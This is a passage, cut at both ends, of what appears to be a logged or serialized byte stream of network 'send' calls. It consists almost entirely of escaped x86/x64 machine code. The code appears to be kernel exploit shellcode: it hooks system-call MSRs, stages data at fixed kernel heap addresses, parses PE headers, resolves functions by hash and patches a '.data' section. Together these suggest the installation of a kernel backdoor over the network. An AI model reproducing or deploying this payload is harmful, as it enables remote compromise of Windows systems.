x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 13, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
